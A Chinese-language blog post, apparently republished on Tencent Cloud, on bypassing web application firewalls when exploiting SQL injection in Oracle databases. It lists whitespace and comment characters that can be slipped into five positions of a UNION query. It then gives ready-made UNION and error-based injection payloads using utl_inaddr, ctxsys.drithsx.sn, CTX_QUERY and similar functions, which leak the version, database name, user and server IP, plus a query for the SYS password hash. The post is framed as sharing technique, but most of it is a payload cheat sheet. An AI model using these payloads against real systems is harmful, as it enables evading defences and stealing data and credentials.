前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >WAF Bypass数据库特性(Oracle探索篇)

WAF Bypass数据库特性(Oracle探索篇)

作者头像
Bypass
发布2019-07-08 17:30:28
1.4K0
发布2019-07-08 17:30:28
举报
文章被收录于专栏:Bypass

0x01 前言

我们经常利用一些数据库特性来进行WAF绕过。在Oracle中,比如可以这样:

代码语言:javascript
复制
空白字符:%00
获取数据库版本:SELECT banner FROM v$version where rownum=1

相比于Mysql/MSsql,它的特性相对较少,但确有其特殊之处,比如空白字符可以用%00替代,一个获取数据库版本的语句就这么长。一起去探索一下Oracle数据库特性,挖掘能够绕过WAF防护的数据库特性。

0x02 测试

常见有5个位置即: SELECT * FROM admin WHERE username = 1【位置一】union【位置二】select【位置三】1,user()【位置四】from【位置五】admin

位置一:参数和union之间的位置

1)空白字符

Oracle中可以利用的空白字符有: %00 %09 %0a %0b %0c %0d %20

2)注释符号/**/

3)其他字符

%2e . 点号

位置二:union和select之间的位置

1)空白字符

Oracle中可以利用的空白字符有: %00 %09 %0a %0b %0c %0d %20

2)注释符号/**/

位置三:select和查询参数之间的位置

1)空白字符

Oracle中可以利用的空白字符有: %00 %09 %0a %0b %0c %0d %20

2)注释符号/**/

3)其他字符

%2b +

%2d -

%ad

select * from emp where mgr=7782 union select+NULL,(SELECT banner FROM v$version where rownum=1),NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL

位置四:查询参数和from之间的位置

1)空白字符

Oracle中可以利用的空白字符有: %00 %09 %0a %0b %0c %0d %20

2)注释符号/**/

位置五:from后面的位置

1)空白字符

Oracle中可以利用的空白字符有: %00 %09 %0a %0b %0c %0d %20

2)注释符号/**/

0x03 函数

类型一:常见函数
代码语言:javascript
复制
SELECT banner FROM v$version where rownum=1   //获取数据库版本
select user from dual where rownum=1          //获取当前连接数据库的用户名
select password from sys.user$ where rownum=1 and name='SYS'  //获取用户SYS密文密码
SELECT name FROM v$database                   //获取库名
select table_name from user_tables where rownum=1   //获取第一个表名
代码语言:javascript
复制
Tips:在oracle 里|| 是连接符号,但是在其他数据库里就不是
id=1 and 1=2 union select (chr(94)||chr(94)||chr(33)||(SELECT banner FROM v$version where rownum=1)||chr(33)||chr(94)||chr(94)) from dual--
类型二:显错注入
代码语言:javascript
复制
?id=1 AND 1=utl_inaddr.get_host_address((SELECT name FROM v$database))—  //获取库名
?id=1 and 1=ctxsys.drithsx.sn(1,(select UTL_INADDR.get_host_address from dual where rownum=1))-- //获取数据库服务器所在ip
?id=1 and 1= CTXSYS.CTX_QUERY.CHK_XPATH((select banner from v$version where rownum=1),'a','b')--
?id=1 Or 1=ORDSYS.ORD_DICOM.GETMAPPINGXPATH((select banner from v$version where rownum=1),'a','b')--
?id=1 and (select dbms_xdb_version.uncheckout((select user from dual)) from dual) is not null—
?id=1 and 1=ctxsys.drithsx.sn(1,(select user from dual))--

0x04 END

本文汇总了一些常见的Oracle数据库特性和常见的数据库函数,仅作抛砖引玉之用,欢迎留言,顺便分享一下你了解的比较有意思的特性。

Bypass

About Me

一个网络安全爱好者,对技术有着偏执狂一样的追求。致力于分享原创高质量干货,包括但不限于:渗透测试、WAF绕过、代码审计、安全运维。

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2019-01-21,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 Bypass 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 0x01 前言
  • 0x02 测试
    • 位置一:参数和union之间的位置
      • 位置二:union和select之间的位置
        • 位置三:select和查询参数之间的位置
          • 位置四:查询参数和from之间的位置
            • 位置五:from后面的位置
            • 0x03 函数
              • 类型一:常见函数
                • 类型二:显错注入
                • 0x04 END
                相关产品与服务
                数据库
                云数据库为企业提供了完善的关系型数据库、非关系型数据库、分析型数据库和数据库生态工具。您可以通过产品选择和组合搭建,轻松实现高可靠、高可用性、高性能等数据库需求。云数据库服务也可大幅减少您的运维工作量,更专注于业务发展,让企业一站式享受数据上云及分布式架构的技术红利!
                领券
                问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档